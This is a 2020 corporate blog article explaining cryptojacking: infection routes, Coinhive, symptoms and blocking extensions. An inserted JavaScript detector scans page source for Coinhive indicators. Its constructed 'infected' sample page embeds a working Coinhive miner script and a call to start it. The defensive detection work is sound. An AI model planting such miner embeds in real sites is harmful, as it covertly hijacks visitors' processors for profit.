What do we know about Cryptojacking?

Emirex Group | Aug 13, 2020 5:58:22 PM

Cryptojacking (also known as "malicious mining") is a relatively recent online threat. Malicious objects associated with this threat hide on computers or mobile devices and use their resources to mine cryptocurrencies. The threat is actively evolving and taking new forms: it hijacks Internet browsers and affects all types of devices, from desktops and laptops to smartphones and even network servers.

As with other malware attacks, the main motive behind cryptojacking is profit, but unlike other threats, malicious objects of this type try to hide their presence from the user. This hidden nature is very attractive to cybercriminals because it lets them make more money with less risk of being caught and identified.

Understand how it works

To use people's devices for the purpose of mining cryptocurrencies, hackers use several methods:

  • Infection via email using phishing tactics. When you click on a link or download an email attachment, malicious code is launched within a few seconds and installs its script on the computer. After that, the illegally installed script runs quietly in the background, unnoticed;
  • Infection by visiting malicious websites or viewing online advertisements. This method is known as browser mining. Since JavaScript is present on almost every website, it is possible to inject a malicious script into the source code of web pages.

Hackers break into high-traffic websites in order to insert their scripts. Some online companies also use malicious scripts as a way to generate alternative income for their businesses. Scripts usually use few resources and do not interfere with overall computer use, making them incredibly difficult to detect.


Vivid Example: Coinhive

Coinhive is the most popular cryptojacking malware. It is an open-source JavaScript miner for Monero that can be embedded into any website. When users visit a site with the embedded code, their browsers start mining Monero (XMR) using the power of the processor. The virus is also embedded in ad blockers, free files, or any other popular programs that an attacker manages to infect. Anyone can put Coinhive on their own website to profit from the unsuspecting people who visit it. You can find out whether Coinhive is running on a site by checking its source code.
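One way to do the source-code check mentioned above, as an added example that is not part of the original article or Coinhive's own code: it scans a page's HTML for script tags that load the Coinhive library or instantiate its miner. The indicator list, the function name and the two sample pages are assumptions constructed for illustration.

```javascript
// Added example: static scan of a page's HTML source for Coinhive references.
// INDICATORS is an illustrative, incomplete list assumed for this example.
const INDICATORS = [
  { name: "coinhive-script-host", re: /(^|\/\/|\.)coinhive\.com\//i },
  { name: "coinhive-library-file", re: /coinhive\.min\.js/i },
  { name: "coinhive-constructor", re: /\bCoinHive\.(Anonymous|User)\s*\(/ },
];

// Returns one finding per indicator hit, for external (src) and inline scripts.
function findMinerIndicators(html) {
  const findings = [];
  const scriptTag = /<script\b([^>]*)>([\s\S]*?)<\/script\s*>/gi;
  let m;
  while ((m = scriptTag.exec(html)) !== null) {
    // Accept double-quoted, single-quoted and unquoted src attribute values.
    const srcMatch = /\bsrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/i.exec(m[1]);
    const src = srcMatch ? srcMatch[1] || srcMatch[2] || srcMatch[3] : "";
    const body = m[2].trim();
    for (const { name, re } of INDICATORS) {
      if (src && re.test(src)) findings.push({ indicator: name, where: "src", value: src });
      if (body && re.test(body)) findings.push({ indicator: name, where: "inline", value: body.slice(0, 60) });
    }
  }
  return findings;
}

// Constructed sample pages (not captured from any real site).
const SAMPLE_INFECTED = `
<html><head>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
  var miner = new CoinHive.Anonymous('SITE_KEY_PLACEHOLDER', { throttle: 0.8 });
  miner.start();
</script>
</head><body>Hello</body></html>`;
const SAMPLE_CLEAN = `<html><head><script src="/static/app.js"></script>
<script>console.log("coin prices loaded");</script></head></html>`;

console.log(findMinerIndicators(SAMPLE_INFECTED)); // three findings
console.log(findMinerIndicators(SAMPLE_CLEAN));    // empty list
```

A static scan like this misses miners that are obfuscated or loaded dynamically, so a clean result should be read together with the CPU symptoms covered in the detection section.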

How to detect?

You can notice the signs of malicious cryptojacking on your own. The symptoms of infection are:

  • Sluggish performance or unusually slow response times;
  • Overheating of the device;
  • High processor load (can be checked in the task manager).

If a device is exposed to cryptojacking when you visit a particular web page, the responsiveness of the system drops drastically (the browser and other running processes slow down). If you notice this sign, you must immediately check the CPU. When the processor is 100% loaded, the reason may be in-browser mining. To stop it, close the browser tab whose opening made the system start to behave strangely.

Sometimes, in order to detect cryptojacking, it is enough to pay attention to the sound of your coolers: if the cooling fans suddenly begin to hum loudly after you open a certain site, it is likely that someone is mining digital coins at your expense.

How to prevent it?

There are browser extensions that can effectively prevent most cryptojacking attacks over the Internet. We also recommend that users keep their operating system and antivirus software up to date.

Here are some tools and plugins to help you avoid these types of threats:

  • Anti-mining NoCoin is an extension available for the Chrome, Firefox and Opera browsers. The tool can block a wide variety of web miners, including Coinhive;
  • NoScript (Firefox extension) / ScriptSafe (Chrome extension) are extensions that can be used to block JavaScript. However, such extensions can be quite aggressive and interfere with the normal functioning of other websites;
  • Adblocker is an embedded ad-blocking app that helps prevent cryptocurrency mining. Ad blocker settings depend on the browser used.

